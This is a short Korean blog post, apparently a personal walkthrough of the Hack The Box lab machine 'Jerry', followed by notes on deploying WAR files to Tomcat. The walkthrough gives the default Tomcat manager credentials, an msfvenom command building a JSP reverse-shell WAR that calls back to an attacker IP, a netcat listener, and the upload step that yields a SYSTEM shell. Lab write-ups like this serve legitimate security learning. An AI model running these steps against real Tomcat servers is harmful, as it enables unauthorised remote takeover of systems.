nmap
삽질
searchsploit -> not vulnerable..
admin/admin
nikto scan
엄청 느리다
=> 여기서 /manage/html이 tomcat/s3cret로 뚫린다는 취약점이 나온다.
tomcat/s3cret
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=1234 -f war > shell.war
nc -nlvp 1234 열어놓고
해당 war 업로드 후 http://10.10.10.95:8080/shell 접속
바로 system 권한의 쉘이 따진다.
tomcat 웹 애플리케이션 배포
배포할 프로젝트를 war로 추출한다.
war는 web application archive의 약자로 웹 애플리케이션을 배포하기 위한 파일들의 압축
war를 tomcat으로 배포하는 방법(두 가지)
1. 톰캣에서 제공하는 /manage/html 페이지에서 설정
=> 방금 jerry를 해결한 방법이며, war 파일을 업로드하고 <ip>:8080/war파일명 으로 접근할 수 있다.
2. 톰캣 경로\conf\server.xml 파일을 통한 webapp 설정
출처
https://attibook.tistory.com/240
'워게임 > hackthebox' 카테고리의 다른 글
chatterbox 롸업 정리 (1) | 2021.10.12 |
---|---|
jarvis 롸업 정리 (0) | 2021.10.10 |
silo 롸업 정리(tns listener) (0) | 2021.10.06 |
grandpa 롸업 정리- 다시해보기 (0) | 2021.10.05 |
arctic 롸업 정리 (0) | 2021.10.05 |
댓글